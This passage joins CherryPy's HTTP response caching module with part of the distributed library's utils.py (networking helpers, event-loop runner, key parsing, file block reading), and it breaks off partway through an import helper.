In general, GET responses are cached (along with selecting headers) and, if
another request arrives for the same resource, the caching Tool will return 304
Not Modified if possible, or serve the cached response otherwise. It also sets
request.cached to True if serving a cached representation, and sets
request.cacheable to False (so it doesn't get cached again).
If POST, PUT, or DELETE requests are made for a cached resource, they
invalidate (delete) any cached response.
Usage
=====
Configuration file example::
[/]
tools.caching.on = True
tools.caching.delay = 3600
You may use a class other than the default
:class:`MemoryCache<cherrypy.lib.caching.MemoryCache>` by supplying the config
entry ``cache_class``; supply the full dotted name of the replacement class
as the config value. It must implement the basic methods ``get``, ``put``,
``delete``, and ``clear``.
You may set any attribute, including overriding methods, on the cache
instance by providing them in config. The above sets the
:attr:`delay<cherrypy.lib.caching.MemoryCache.delay>` attribute, for example.
"""
import datetime
import sys
import threading
import time
import six
import cherrypy
from cherrypy.lib import cptools, httputil
from cherrypy._cpcompat import ntob, Event
class Cache(object):
"""Base class for Cache implementations."""
def get(self):
"""Return the current variant if in the cache, else None."""
raise NotImplemented
def put(self, obj, size):
"""Store the current variant in the cache."""
raise NotImplemented
def delete(self):
"""Remove ALL cached variants of the current resource."""
raise NotImplemented
def clear(self):
"""Reset the cache to its initial, empty state."""
raise NotImplemented
# ------------------------------ Memory Cache ------------------------------- #
class AntiStampedeCache(dict):
"""A storage system for cached items which reduces stampede collisions."""
def wait(self, key, timeout=5, debug=False):
"""Return the cached value for the given key, or None.
If timeout is not None, and the value is already
being calculated by another thread, wait until the given timeout has
elapsed. If the value is available before the timeout expires, it is
returned. If not, None is returned, and a sentinel placed in the cache
to signal other threads to wait.
If timeout is None, no waiting is performed nor sentinels used.
"""
value = self.get(key)
if isinstance(value, Event):
if timeout is None:
# Ignore the other thread and recalc it ourselves.
if debug:
cherrypy.log('No timeout', 'TOOLS.CACHING')
return None
# Wait until it's done or times out.
if debug:
cherrypy.log('Waiting up to %s seconds' %
timeout, 'TOOLS.CACHING')
value.wait(timeout)
if value.result is not None:
# The other thread finished its calculation. Use it.
if debug:
cherrypy.log('Result!', 'TOOLS.CACHING')
return value.result
# Timed out. Stick an Event in the slot so other threads wait
# on this one to finish calculating the value.
if debug:
cherrypy.log('Timed out', 'TOOLS.CACHING')
e = threading.Event()
e.result = None
dict.__setitem__(self, key, e)
return None
elif value is None:
# Stick an Event in the slot so other threads wait
# on this one to finish calculating the value.
if debug:
cherrypy.log('Timed out', 'TOOLS.CACHING')
e = threading.Event()
e.result = None
dict.__setitem__(self, key, e)
return value
def __setitem__(self, key, value):
"""Set the cached value for the given key."""
existing = self.get(key)
dict.__setitem__(self, key, value)
if isinstance(existing, Event):
# Set Event.result so other threads waiting on it have
# immediate access without needing to poll the cache again.
existing.result = value
existing.set()
class MemoryCache(Cache):
"""An in-memory cache for varying response content.
Each key in self.store is a URI, and each value is an AntiStampedeCache.
The response for any given URI may vary based on the values of
"selecting request headers"; that is, those named in the Vary
response header. We assume the list of header names to be constant
for each URI throughout the lifetime of the application, and store
that list in ``self.store[uri].selecting_headers``.
The items contained in ``self.store[uri]`` have keys which are tuples of
request header values (in the same order as the names in its
selecting_headers), and values which are the actual responses.
"""
maxobjects = 1000
"""The maximum number of cached objects; defaults to 1000."""
maxobj_size = 100000
"""The maximum size of each cached object in bytes; defaults to 100 KB."""
maxsize = 10000000
"""The maximum size of the entire cache in bytes; defaults to 10 MB."""
delay = 600
"""Seconds until the cached content expires; defaults to 600 (10 minutes).
"""
antistampede_timeout = 5
"""Seconds to wait for other threads to release a cache lock."""
expire_freq = 0.1
"""Seconds to sleep between cache expiration sweeps."""
debug = False
def __init__(self):
self.clear()
# Run self.expire_cache in a separate daemon thread.
t = threading.Thread(target=self.expire_cache, name='expire_cache')
self.expiration_thread = t
t.daemon = True
t.start()
def clear(self):
"""Reset the cache to its initial, empty state."""
self.store = {}
self.expirations = {}
self.tot_puts = 0
self.tot_gets = 0
self.tot_hist = 0
self.tot_expires = 0
self.tot_non_modified = 0
self.cursize = 0
def expire_cache(self):
"""Continuously examine cached objects, expiring stale ones.
This function is designed to be run in its own daemon thread,
referenced at ``self.expiration_thread``.
"""
# It's possible that "time" will be set to None
# arbitrarily, so we check "while time" to avoid exceptions.
# See tickets #99 and #180 for more information.
while time:
now = time.time()
# Must make a copy of expirations so it doesn't change size
# during iteration
items = list(six.iteritems(self.expirations))
for expiration_time, objects in items:
if expiration_time <= now:
for obj_size, uri, sel_header_values in objects:
try:
del self.store[uri][tuple(sel_header_values)]
self.tot_expires += 1
self.cursize -= obj_size
except KeyError:
# the key may have been deleted elsewhere
pass
del self.expirations[expiration_time]
time.sleep(self.expire_freq)
def get(self):
"""Return the current variant if in the cache, else None."""
request = cherrypy.serving.request
self.tot_gets += 1
uri = cherrypy.url(qs=request.query_string)
uricache = self.store.get(uri)
if uricache is None:
return None
header_values = [request.headers.get(h, '')
for h in uricache.selecting_headers]
variant = uricache.wait(key=tuple(sorted(header_values)),
timeout=self.antistampede_timeout,
debug=self.debug)
if variant is not None:
self.tot_hist += 1
return variant
def put(self, variant, size):
"""Store the current variant in the cache."""
request = cherrypy.serving.request
response = cherrypy.serving.response
uri = cherrypy.url(qs=request.query_string)
uricache = self.store.get(uri)
if uricache is None:
uricache = AntiStampedeCache()
uricache.selecting_headers = [
e.value for e in response.headers.elements('Vary')]
self.store[uri] = uricache
if len(self.store) < self.maxobjects:
total_size = self.cursize + size
# checks if there's space for the object
if (size < self.maxobj_size and total_size < self.maxsize):
# add to the expirations list
expiration_time = response.time + self.delay
bucket = self.expirations.setdefault(expiration_time, [])
bucket.append((size, uri, uricache.selecting_headers))
# add to the cache
header_values = [request.headers.get(h, '')
for h in uricache.selecting_headers]
uricache[tuple(sorted(header_values))] = variant
self.tot_puts += 1
self.cursize = total_size
def delete(self):
"""Remove ALL cached variants of the current resource."""
uri = cherrypy.url(qs=cherrypy.serving.request.query_string)
self.store.pop(uri, None)
def get(invalid_methods=('POST', 'PUT', 'DELETE'), debug=False, **kwargs):
"""Try to obtain cached output. If fresh enough, raise HTTPError(304).
If POST, PUT, or DELETE:
* invalidates (deletes) any cached response for this resource
* sets request.cached = False
* sets request.cacheable = False
else if a cached copy exists:
* sets request.cached = True
* sets request.cacheable = False
* sets response.headers to the cached values
* checks the cached Last-Modified response header against the
current If-(Un)Modified-Since request headers; raises 304
if necessary.
* sets response.status and response.body to the cached values
* returns True
otherwise:
* sets request.cached = False
* sets request.cacheable = True
* returns False
"""
request = cherrypy.serving.request
response = cherrypy.serving.response
if not hasattr(cherrypy, '_cache'):
# Make a process-wide Cache object.
cherrypy._cache = kwargs.pop('cache_class', MemoryCache)()
# Take all remaining kwargs and set them on the Cache object.
for k, v in kwargs.items():
setattr(cherrypy._cache, k, v)
cherrypy._cache.debug = debug
# POST, PUT, DELETE should invalidate (delete) the cached copy.
# See http://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html#sec13.10.
if request.method in invalid_methods:
if debug:
cherrypy.log('request.method %r in invalid_methods %r' %
(request.method, invalid_methods), 'TOOLS.CACHING')
cherrypy._cache.delete()
request.cached = False
request.cacheable = False
return False
if 'no-cache' in [e.value for e in request.headers.elements('Pragma')]:
request.cached = False
request.cacheable = True
return False
cache_data = cherrypy._cache.get()
request.cached = bool(cache_data)
request.cacheable = not request.cached
if request.cached:
# Serve the cached copy.
max_age = cherrypy._cache.delay
for v in [e.value for e in request.headers.elements('Cache-Control')]:
atoms = v.split('=', 1)
directive = atoms.pop(0)
if directive == 'max-age':
if len(atoms) != 1 or not atoms[0].isdigit():
raise cherrypy.HTTPError(
400, 'Invalid Cache-Control header')
max_age = int(atoms[0])
break
elif directive == 'no-cache':
if debug:
cherrypy.log(
'Ignoring cache due to Cache-Control: no-cache',
'TOOLS.CACHING')
request.cached = False
request.cacheable = True
return False
if debug:
cherrypy.log('Reading response from cache', 'TOOLS.CACHING')
s, h, b, create_time = cache_data
age = int(response.time - create_time)
if (age > max_age):
if debug:
cherrypy.log('Ignoring cache due to age > %d' % max_age,
'TOOLS.CACHING')
request.cached = False
request.cacheable = True
return False
# Copy the response headers. See
# https://github.com/cherrypy/cherrypy/issues/721.
response.headers = rh = httputil.HeaderMap()
for k in h:
dict.__setitem__(rh, k, dict.__getitem__(h, k))
# Add the required Age header
response.headers['Age'] = str(age)
try:
# Note that validate_since depends on a Last-Modified header;
# this was put into the cached copy, and should have been
# resurrected just above (response.headers = cache_data[1]).
cptools.validate_since()
except cherrypy.HTTPRedirect:
x = sys.exc_info()[1]
if x.status == 304:
cherrypy._cache.tot_non_modified += 1
raise
# serve it & get out from the request
response.status = s
response.body = b
else:
if debug:
cherrypy.log('request is not cached', 'TOOLS.CACHING')
return request.cached
def tee_output():
"""Tee response output to cache storage. Internal."""
# Used by CachingTool by attaching to request.hooks
request = cherrypy.serving.request
if 'no-store' in request.headers.values('Cache-Control'):
return
def tee(body):
"""Tee response.body into a list."""
if ('no-cache' in response.headers.values('Pragma') or
'no-store' in response.headers.values('Cache-Control')):
for chunk in body:
yield chunk
return
output = []
for chunk in body:
output.append(chunk)
yield chunk
# save the cache data
body = ntob('').join(output)
cherrypy._cache.put((response.status, response.headers or {},
body, response.time), len(body))
response = cherrypy.serving.response
response.body = tee(response.body)
def expires(secs=0, force=False, debug=False):
"""Tool for influencing cache mechanisms using the 'Expires' header.
secs
Must be either an int or a datetime.timedelta, and indicates the
number of seconds between response.time and when the response should
expire. The 'Expires' header will be set to response.time + secs.
If secs is zero, the 'Expires' header is set one year in the past, and
the following "cache prevention" headers are also set:
* Pragma: no-cache
* Cache-Control': no-cache, must-revalidate
force
If False, the following headers are checked:
* Etag
* Last-Modified
* Age
* Expires
If any are already present, none of the above response headers are set.
"""
response = cherrypy.serving.response
headers = response.headers
cacheable = False
if not force:
# some header names that indicate that the response can be cached
for indicator in ('Etag', 'Last-Modified', 'Age', 'Expires'):
if indicator in headers:
cacheable = True
break
if not cacheable and not force:
if debug:
cherrypy.log('request is not cacheable', 'TOOLS.EXPIRES')
else:
if debug:
cherrypy.log('request is cacheable', 'TOOLS.EXPIRES')
if isinstance(secs, datetime.timedelta):
secs = (86400 * secs.days) + secs.seconds
if secs == 0:
if force or ('Pragma' not in headers):
headers['Pragma'] = 'no-cache'
if cherrypy.serving.request.protocol >= (1, 1):
if force or 'Cache-Control' not in headers:
headers['Cache-Control'] = 'no-cache, must-revalidate'
# Set an explicit Expires date in the past.
expiry = httputil.HTTPDate(1169942400.0)
else:
expiry = httputil.HTTPDate(response.time + secs)
if force or 'Expires' not in headers:
headers['Expires'] = expiry
|
utils.py
|
import asyncio
from asyncio import TimeoutError
import atexit
import click
from collections import deque, OrderedDict, UserDict
from concurrent.futures import ThreadPoolExecutor, CancelledError # noqa: F401
from contextlib import contextmanager, suppress
import functools
from hashlib import md5
import html
import json
import logging
import multiprocessing
import os
import re
import shutil
import socket
from time import sleep
import importlib
from importlib.util import cache_from_source
import inspect
import sys
import tempfile
import threading
import warnings
import weakref
import pkgutil
import base64
import tblib.pickling_support
import xml.etree.ElementTree
try:
import resource
except ImportError:
resource = None
import dask
from dask import istask
# provide format_bytes here for backwards compatibility
from dask.utils import ( # noqa
format_bytes,
funcname,
format_time,
parse_bytes,
parse_timedelta,
)
import tlz as toolz
from tornado import gen
from tornado.ioloop import IOLoop
try:
from tornado.ioloop import PollIOLoop
except ImportError:
PollIOLoop = None # dropped in tornado 6.0
from .compatibility import PYPY, WINDOWS, get_running_loop
from .metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
logger = _logger = logging.getLogger(__name__)
no_default = "__no_default__"
def _initialize_mp_context():
if WINDOWS or PYPY:
return multiprocessing
else:
method = dask.config.get("distributed.worker.multiprocessing-method")
ctx = multiprocessing.get_context(method)
# Makes the test suite much faster
preload = ["distributed"]
if "pkg_resources" in sys.modules:
preload.append("pkg_resources")
from .versions import required_packages, optional_packages
for pkg, _ in required_packages + optional_packages:
try:
importlib.import_module(pkg)
except ImportError:
pass
else:
preload.append(pkg)
ctx.set_forkserver_preload(preload)
return ctx
mp_context = _initialize_mp_context()
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in inspect.getfullargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@toolz.memoize
def _get_ip(host, port, family):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except EnvironmentError as e:
warnings.warn(
"Couldn't detect a suitable IP address for "
"reaching %r, defaulting to hostname: %s" % (host, e),
RuntimeWarning,
)
addr_info = socket.getaddrinfo(
socket.gethostname(), port, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP
)[0]
return addr_info[4][0]
finally:
sock.close()
def get_ip(host="8.8.8.8", port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET)
def get_ipv6(host="2001:4860:4860::8888", port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6)
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
KeyError is raised if the interface doesn't exist.
ValueError is raised if the interface does no have an IPv4 address
associated with it.
"""
import psutil
net_if_addrs = psutil.net_if_addrs()
if ifname not in net_if_addrs:
allowed_ifnames = list(net_if_addrs.keys())
raise ValueError(
"{!r} is not a valid network interface. "
"Valid network interfaces are: {}".format(ifname, allowed_ifnames)
)
for info in net_if_addrs[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,))
# FIXME: this breaks if changed to async def...
@gen.coroutine
def ignore_exceptions(coroutines, *exceptions):
"""Process list of coroutines, ignoring certain exceptions
>>> coroutines = [cor(...) for ...] # doctest: +SKIP
>>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP
"""
wait_iterator = gen.WaitIterator(*coroutines)
results = []
while not wait_iterator.done():
with suppress(*exceptions):
result = yield wait_iterator.next()
results.append(result)
raise gen.Return(results)
async def All(args, quiet_exceptions=()):
"""Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
return results
async def Any(args, quiet_exceptions=()):
"""Wait on many tasks at the same time and return when any is finished
Err once any of the tasks err.
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
break
return results
def sync(loop, func, *args, callback_timeout=None, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
# Tornado's PollIOLoop doesn't raise when using closed, do it ourselves
if PollIOLoop and (
(isinstance(loop, PollIOLoop) and getattr(loop, "_closing", False))
or (hasattr(loop, "asyncio_loop") and loop.asyncio_loop._closed)
):
raise RuntimeError("IOLoop is closed")
try:
if loop.asyncio_loop.is_closed(): # tornado 6
raise RuntimeError("IOLoop is closed")
except AttributeError:
pass
e = threading.Event()
main_tid = threading.get_ident()
result = [None]
error = [False]
@gen.coroutine
def f():
try:
if main_tid == threading.get_ident():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
thread_state.asynchronous = True
future = func(*args, **kwargs)
if callback_timeout is not None:
future = asyncio.wait_for(future, callback_timeout)
result[0] = yield future
except Exception as exc:
error[0] = sys.exc_info()
finally:
thread_state.asynchronous = False
e.set()
loop.add_callback(f)
if callback_timeout is not None:
if not e.wait(callback_timeout):
raise TimeoutError("timed out after %s s." % (callback_timeout,))
else:
while not e.is_set():
e.wait(10)
if error[0]:
typ, exc, tb = error[0]
raise exc.with_traceback(tb)
else:
return result[0]
class LoopRunner:
"""
A helper to start and stop an IO loop in a controlled way.
Several loop runners can associate safely to the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
current = IOLoop.current()
if loop is None:
if asynchronous:
self._loop = current
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
self._should_close_loop = True
else:
self._loop = loop
self._should_close_loop = False
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if self._asynchronous or real_runner is not None or count > 0:
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
try:
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop, name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=10)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if not isinstance(start_exc[0], RuntimeError):
if not isinstance(
start_exc[0], Exception
): # track down infrequent error
raise TypeError("not an exception", start_exc[0])
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
with suppress(KeyError): # IOLoop can be missing
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, "w") as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def clear_queue(q):
while not q.empty():
q.get_nowait()
def is_kernel():
"""Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if "IPython" not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), "kernel", None) is not None
hex_pattern = re.compile("[a-f]+")
@functools.lru_cache(100000)
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split("-")
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (
len(word) == 8 and hex_pattern.match(word) is not None
):
result += "-" + word
else:
break
if len(result) == 32 and re.match(r"[a-f0-9]{32}", result):
return "data"
else:
if result[0] == "<":
result = result.strip("<>").split()[0].split(".")[-1]
return result
except Exception:
return "Other"
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group('x')
>>> key_split_group('x-1')
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == "(":
return x.split(",", 1)[0].strip("()\"'")
elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x):
return "data"
elif x[0] == "<":
return x.strip("<>").split()[0].split(".")[-1]
else:
return key_split(x)
elif typ is bytes:
return key_split_group(x.decode())
else:
return key_split(x)
@contextmanager
def log_errors(pdb=False):
from .comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root="distributed"):
"""
Change all StreamHandlers for the given logger to the given level
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@toolz.memoize
def ensure_ip(hostname):
"""Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(
hostname, 1234, fam, socket.SOCK_STREAM # dummy port number
)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [
os.path.join("distributed", "worker"),
os.path.join("distributed", "scheduler"),
os.path.join("tornado", "gen.py"),
os.path.join("concurrent", "futures"),
]
while exc_traceback and any(
b in exc_traceback.tb_frame.f_code.co_filename for b in bad
):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
""" Truncate exception to be about a certain length """
if len(str(e)) > n:
try:
return type(e)("Long error message", str(e)[:n])
except Exception:
return Exception("Long error message", type(e), str(e)[:n])
else:
return e
def tokey(o):
"""Convert an object to a string.
Examples
--------
>>> tokey(b'x')
b'x'
>>> tokey('x')
'x'
>>> tokey(1)
'1'
"""
typ = type(o)
if typ is str or typ is bytes:
return o
else:
return str(o)
def validate_key(k):
"""Validate a key as received on a stream."""
typ = type(k)
if typ is not str and typ is not bytes:
raise TypeError("Unexpected key type %s (value: %r)" % (typ, k))
def _maybe_complex(task):
""" Possibly contains a nested task """
return (
istask(task)
or type(task) is list
and any(map(_maybe_complex, task))
or type(task) is dict
and any(map(_maybe_complex, task.values()))
)
def convert(task, dsk, extra_values):
if type(task) is list:
return [convert(v, dsk, extra_values) for v in task]
if type(task) is dict:
return {k: convert(v, dsk, extra_values) for k, v in task.items()}
if istask(task):
return (task[0],) + tuple(convert(x, dsk, extra_values) for x in task[1:])
try:
if task in dsk or task in extra_values:
return tokey(task)
except TypeError:
pass
return task
def str_graph(dsk, extra_values=()):
return {tokey(k): convert(v, dsk, extra_values) for k, v in dsk.items()}
def seek_delimiter(file, delimiter, blocksize):
"""Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b""
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter) :]
def read_block(f, offset, length, delimiter=None):
"""Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2 ** 16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2 ** 16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
@contextmanager
def tmpfile(extension=""):
extension = "." + extension.lstrip(".")
handle, filename = tempfile.mkstemp(extension)
os.close(handle)
os.remove(filename)
yield filename
if os.path.exists(filename):
try:
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
os.remove(filename)
except OSError: # sometimes we can't remove a generated temp file
pass
def ensure_bytes(s):
"""Attempt to turn `s` into bytes.
Parameters
----------
s : Any
The object to be converted. Will correctly handled
* str
* bytes
* objects implementing the buffer protocol (memoryview, ndarray, etc.)
Returns
-------
b : bytes
Raises
------
TypeError
When `s` cannot be converted
Examples
--------
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if isinstance(s, bytes):
return s
elif hasattr(s, "encode"):
return s.encode()
else:
try:
return bytes(s)
except Exception as e:
raise TypeError(
"Object %s is neither a bytes object nor has an encode method" % s
) from e
def divide_n_among_bins(n, bins):
"""
>>> divide_n_among_bins(12, [1, 1])
[6, 6]
>>> divide_n_among_bins(12, [1, 2])
[4, 8]
>>> divide_n_among_bins(12, [1, 2, 1])
[3, 6, 3]
>>> divide_n_among_bins(11, [1, 2, 1])
[2, 6, 3]
>>> divide_n_among_bins(11, [.1, .2, .1])
[2, 6, 3]
"""
total = sum(bins)
acc = 0.0
out = []
for b in bins:
now = n / total * b + acc
now, acc = divmod(now, 1)
out.append(int(now))
return out
def mean(seq):
seq = list(seq)
return sum(seq) / len(seq)
if hasattr(sys, "is_finalizing"):
def shutting_down(is_finalizing=sys.is_finalizing):
return is_finalizing()
else:
_shutting_down = [False]
def _at_shutdown(l=_shutting_down):
l[0] = True
def shutting_down(l=_shutting_down):
return l[0]
atexit.register(_at_shutdown)
shutting_down.__doc__ = """
Whether the interpreter is currently shutting down.
For use in finalizers, __del__ methods, and similar; it is advised
to early bind this function rather than look it up when calling it,
since at shutdown module globals may be cleared.
"""
def open_port(host=""):
"""Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path):
""" Loads modules for a file (.py, .zip, .egg) """
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import = []
tmp_python_path = None
if ext in (".py",): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == ".py": # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with suppress(OSError):
os.remove(cache_file)
if ext in (".egg", ".zip", ".pyz"):
if path not in sys.path:
sys.path.insert(0, path)
names = (mod_info.name for mod_info in pkgutil.iter_modules([path]))
names_to_import.extend(names)
loaded = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
importlib.invalidate_caches()
if tmp_python_path is not None:
